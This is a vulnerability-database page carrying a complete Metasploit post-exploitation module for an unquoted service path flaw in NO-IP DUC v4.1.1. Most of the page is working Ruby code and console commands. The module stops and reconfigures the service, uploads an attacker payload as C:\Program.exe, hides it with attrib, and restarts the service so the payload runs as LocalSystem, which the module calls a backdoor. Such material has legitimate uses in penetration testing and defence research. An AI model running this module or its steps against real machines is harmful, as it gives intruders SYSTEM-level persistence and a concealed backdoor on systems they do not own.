Vulners
Lucene search
NO-IP DUC v4.1.1 Unquoted Service Path Privilege Escalation Exploit
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
##
# Exploit Title : NO-IP_privilege_scalation.rb - 'Unquoted Service Path Privilege Escalation'
# PDF Version : 4.1.1
# vuln Discover : Ehsan Hosseini
# Module Author : pedr0 Ubuntu [r00t-3xp10it]
# Tested on : Windows 7 Professional
# Software Link : http://www.noip.com/client/DUCSetup_v4_1_1.exe
#
#
#
# [ DESCRIPTION ]
# NO-IP DUC v4.1.1 installs a service with an unquoted service path.
# This enables a local privilege escalation vulnerability. To exploit this vulnerability,
# a local attacker can insert an executable file in the path of the service.
# Rebooting the system or restarting the service will run the malicious executable
# with elevated privileges.
#
# ---------------------------------------------------------------------------
# C:\>sc qc NoIPDUCService4
# [SC] QueryServiceConfig SUCCESS
#
# SERVICE_NAME: NoIPDUCService4
# TYPE : 10 WIN32_OWN_PROCESS
# START_TYPE : 2 AUTO_START
# ERROR_CONTROL : 1 NORMAL
# BINARY_PATH_NAME : C:\Program Files\No-IP\ducservice.exe
# LOAD_ORDER_GROUP :
# TAG : 0
# DISPLAY_NAME : NO-IP DUC v4.1.1
# DEPENDENCIES :
# SERVICE_START_NAME : LocalSystem
# ---------------------------------------------------------------------------
# Using the BINARY_PATH_NAME listed above as an example, an executable named
# "Program.exe" could be placed in "C:\", and it would be executed as the
# Local System user next time the service was restarted.
#
#
#
# [ MODULE OPTIONS ]
# Input The session number to run this module on => set SESSION 3
# Input full path of Program.exe to be uploaded => set UPLOAD_PATH /root/Program.exe
# Check pdfcDispatcher service auto-start status? => set SERVICE_STATUS true
# use attrib to hidde your program.exe in target? => set HIDDEN_ATTRIB true
# HINT: to unset all options: msf post(NO-IP_privilege_scalation) > unset all
#
#
#
# [ PORT MODULE TO METASPLOIT DATABASE ]
# Kali linux COPY TO: /usr/share/metasploit-framework/modules/post/windows/escalate/NO-IP_privilege_scalation.rb
# Ubuntu linux COPY TO: /opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/NO-IP_privilege_scalation.rb
# Manually Path Search: [email protected]:~# locate modules/post/windows/escalate
#
#
# [ LOAD/USE AUXILIARY ]
# meterpreter > background
# msf exploit(handler) > reload_all
# msf exploit(handler) > use post/windows/escalate/NO-IP_privilege_scalation
# msf post(NO-IP_privilege_scalation) > info
# msf post(NO-IP_privilege_scalation) > show options
# msf post(NO-IP_privilege_scalation) > show advanced options
# msf post(NO-IP_privilege_scalation) > set [option(s)]
# msf post(NO-IP_privilege_scalation) > exploit
##
# ----------------------------
# Module Dependencies/requires
# ----------------------------
require 'rex'
require 'msf/core'
require 'msf/core/post/common'
require 'msf/core/post/windows/priv'
# ----------------------------------
# Metasploit Class name and includes
# ----------------------------------
class MetasploitModule < Msf::Post
Rank = ExcellentRanking
include Msf::Post::Common
include Msf::Post::Windows::Priv
# -----------------------------------------
# Building Metasploit/Armitage info GUI/CLI
# -----------------------------------------
def initialize(info={})
super(update_info(info,
'Name' => 'NO-IP_DUC v4.1.1 - Unquoted Service Path Privilege Escalation',
'Description' => %q{
This post-exploitation module requires a meterpreter session to be able to upload/inject our Program.exe into NoIPDUCService4 service. NO-IP_DUC v4.1.1 installs a service with an unquoted service path. This enables a local privilege escalation vulnerability. To exploit this vulnerability, a local attacker can insert an executable file in the path of the service. Rebooting the system or restarting the service will run the malicious executable with elevated privileges. "Warning: payload to be uploaded should be named as: Program.exe"
},
'License' => UNKNOWN_LICENSE,
'Author' =>
[
'Vuln discover: Ehsan Hosseini', # vulnerability discover
'Module Author: pedr0 Ubuntu [r00t-3xp10it]', # post-module author
'Special thanks: milton_barra|Chaitanya Haritash', # testing/debug module
],
'Version' => '$Revision: 1.0',
'DisclosureDate' => 'out 28 2016',
'Platform' => 'windows',
'Arch' => 'x86_x64',
'Privileged' => 'false',
'Targets' =>
[
# Tested againts windows 7 (32 bits) | XP SP1 (32 bits)
[ 'Windows XP', 'Windows VISTA', 'Windows 7', 'Windows 8', 'Windows 9', 'Windows 10' ]
],
'DefaultTarget' => '3', # default its to run againts windows 7 (32 bits)
'References' =>
[
[ 'URL', 'goo.gl/ew1IUm' ],
[ 'URL', 'goo.gl/U54297' ],
[ 'URL', 'http://sourceforge.net/users/peterubuntu10' ],
[ 'URL', 'http://sourceforge.net/projects/msf-auxiliarys/repository' ]
],
'DefaultOptions' =>
{
'SESSION' => '1', # Default its to run againts session 1
},
'SessionTypes' => [ 'meterpreter' ]
))
register_options(
[
OptString.new('SESSION', [ true, 'The session number to run this module on']),
OptString.new('UPLOAD_PATH', [ false, 'The full path of Program.exe to be uploaded']),
OptBool.new('SERVICE_STATUS', [ false, 'Check remote NoIPDUCService4 service settings?' , false]),
OptBool.new('HIDDEN_ATTRIB', [ false, 'Use Attrib command to Hide Program.exe?' , false])
], self.class)
end
# ----------------------------------------------
# Check for proper target Platform (win32|win64)
# ----------------------------------------------
def unsupported
session = client
sys = session.sys.config.sysinfo
print_warning("[ABORT]: Operative System => #{sys['OS']}")
print_error("Only windows systems are supported by this module...")
print_error("Please execute [info] for further information...")
print_line("")
raise Rex::Script::Completed
end
# -----------------------------------------------------------
# UPLOAD OUR EXECUTABLE INTO NoIPDUCService4 BINARY_PATH_NAME
# -----------------------------------------------------------
def ls_stage1
r=''
session = client
shell = "Program.exe"
payload = "C:\\Program.exe"
upath = datastore['UPLOAD_PATH']
bin_path = "C:\\Program Files\\No-IP\\ducservice.exe"
# check for proper config settings enter
# to prevent 'unset all' from deleting default options...
if datastore['UPLOAD_PATH'] == 'nil'
print_error("Options not configurated correctly...")
print_warning("Please set UPLOAD_PATH option!")
return nil
else
print_status("Deploying backdoor into target system!")
sleep(1.0)
end
# check if vulnerable service (executable) exists
if client.fs.file.exist?("#{bin_path}")
print_warning("NoIPDUCService4 service:found")
sleep(1.0)
print_good("Stoping NoIPDUCService4 service...")
# stop service to enable proper configuration
r = session.sys.process.execute("cmd.exe /c sc stop NoIPDUCService4", nil, {'Hidden' => true, 'Channelized' => true})
sleep(2.5)
print_good("Set service to auto-start with windows...")
# set service to auto-start with windows
r = session.sys.process.execute("cmd.exe /c sc config NoIPDUCService4 start= auto", nil, {'Hidden' => true, 'Channelized' => true})
sleep(1.0)
# upload our executable into temp foldder
print_good("Uploading payload to target system...")
client.fs.file.upload("%temp%\\#{shell}","#{upath}")
sleep(2.0)
# move payload to the rigth directory (unquoted service path)
print_good("moving payload to: #{payload}")
r = session.sys.process.execute("cmd.exe /c move /y %temp%\\#{shell} #{payload}", nil, {'Hidden' => true, 'Channelized' => true})
sleep(1.0)
# start remote service ...
print_good("Restarting pdfcDispatcher service...")
r = session.sys.process.execute("cmd.exe /c sc start NoIPDUCService4", nil, {'Hidden' => true, 'Channelized' => true})
sleep(2.0)
# task completed successefully...
print_warning("NoIPDUCService4 service [binary_path_name] backdoored successefuly!")
print_status("Setup one handler and Wait everytime that system restarts OR")
print_status("Setup one handler and restart NoIPDUCService4 service: sc start NoIPDUCService4")
print_line("")
else
print_error("NoIPDUCService4 service => NOT FOUND...")
print_warning("Target system does not appear to vulnerable to this")
print_warning("post-module has aborted all tasks in hands :( ")
print_line("")
end
# close channel when done
r.channel.close
r.close
# error exception funtion
rescue ::Exception => e
print_error("Error: #{e.class} #{e}")
end
# -------------------------------------------------
# USE ATTRIB COMMAND TO HIDDE PROGRAM.EXE (PAYLOAD)
# -------------------------------------------------
def ls_stage2
r=''
session = client
shell = "Program.exe"
payload = "C:\\Program.exe"
# check for proper config settings enter
# to prevent 'unset all' from deleting default options...
if datastore['HIDDEN_ATTRIB'] == 'nil'
print_error("Options not configurated correctly...")
print_warning("Please set HIDDEN_ATTRIB option!")
return nil
else
print_status("Using Attrib command to hide backdoor!")
sleep(1.0)
end
# check if backdoor.exe exist on target
if client.fs.file.exist?("#{payload}")
print_status("Backdoor #{shell} file:found")
sleep(1.0)
# change attributes of backdoor to hidde it from site...
r = session.sys.process.execute("cmd.exe /c attrib +h +s #{payload}", nil, {'Hidden' => true, 'Channelized' => true})
print_good(" Execute => attrib +h +s #{payload}")
sleep(2.0)
# diplay output to user
print_status("Our #{shell} its hidden from normal people!")
print_status("Just dont feed the black hacker within :( ")
print_warning("To revert attributes: attrib -h -s #{payload}")
print_line("")
# close channel when done
r.channel.close
r.close
else
print_error("#{payload} => NOT FOUND...")
print_warning("post-module has aborted all tasks in hands :( ")
print_line("")
end
# error exception funtion
rescue ::Exception => e
print_error("Error: #{e.class} #{e}")
end
# -------------------------------------------
# CHECK/DISPLAY pdfcDispatcher SERVICE STATUS
# -------------------------------------------
def ls_stage3
r=''
session = client
serv="NoIPDUCService4"
sysnfo = session.sys.config.sysinfo
# check for proper config settings enter
# to prevent 'unset all' from deleting default options...
if datastore['SERVICE_STATUS'] == 'nil'
print_error("Options not configurated correctly...")
print_warning("Please set SERVICE_STATUS option!")
return nil
else
print_status("Checking NoIPDUCService4 service settings!")
sleep(1.0)
end
print_warning("Reading service hive registry keys...")
# search in target regedit for WSearch auto-start service status
# Value:Start - dword: 2 - auto | 3 - manual | 4 - disabled
if registry_getvaldata("HKLM\\System\\CurrentControlSet\\services\\NoIPDUCService4","Start") == '2'
startup = "auto_start"
end
if registry_getvaldata("HKLM\\System\\CurrentControlSet\\services\\NoIPDUCService4","Start") == '3'
startup = "manual_start"
end
if registry_getvaldata("HKLM\\System\\CurrentControlSet\\services\\NoIPDUCService4","Start") == '4'
startup = "disabled_start"
else
startup = "unknow"
print_error("post-module cant define service auto_start status...")
print_warning("enter into a shell session and execute: sc qc NoIPDUCService4 status")
end
sleep(1.0)
# display pdfcDispatcher service current settings.
print_line("")
print_line(" :host => #{sysnfo['Computer']}")
print_line(" :service => #{serv}")
print_line(" :status => running")
print_line(" :startup => #{startup}")
print_line("")
# error exception funtion
rescue ::Exception => e
print_error("Error: #{e.class} #{e}")
end
# ------------------------------------------------
# MAIN DISPLAY WINDOWS (ALL MODULES - def run)
# Running sellected modules against session target
# ------------------------------------------------
def run
session = client
# Check for proper target Platform
unsupported if client.platform !~ /win32|win64/i
# Variable declarations (msf API calls)
sysnfo = session.sys.config.sysinfo
runtor = client.sys.config.getuid
runsession = client.session_host
directory = client.fs.dir.pwd
# Print banner and scan results on screen pdfcDispatcher
print_line(" +----------------------------------------------+")
print_line(" | NO-IP_DUCK - SERVICE PRIVILEGE ESCALATION |")
print_line(" | Author: Pedro Ubuntu [ r00t-3xp10it ] |")
print_line(" +----------------------------------------------+")
print_line("")
print_line(" Running on session : #{datastore['SESSION']}")
print_line(" Computer : #{sysnfo['Computer']}")
print_line(" Operative System : #{sysnfo['OS']}")
print_line(" Target IP addr : #{runsession}")
print_line(" Payload directory : #{directory}")
print_line(" Client UID : #{runtor}")
print_line("")
print_line("")
# elevate session privileges befor runing options
client.sys.config.getprivs.each do |priv|
end
# ------------------------------------
# Selected settings to run
# ------------------------------------
if datastore['UPLOAD_PATH']
ls_stage1
end
if datastore['HIDDEN_ATTRIB']
ls_stage2
end
if datastore['SERVICE_STATUS']
ls_stage3
end
end
end
# 0day.today [2018-04-08] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Oct 2016 00:00Current
0.5Low risk
Vulners AI Score0.5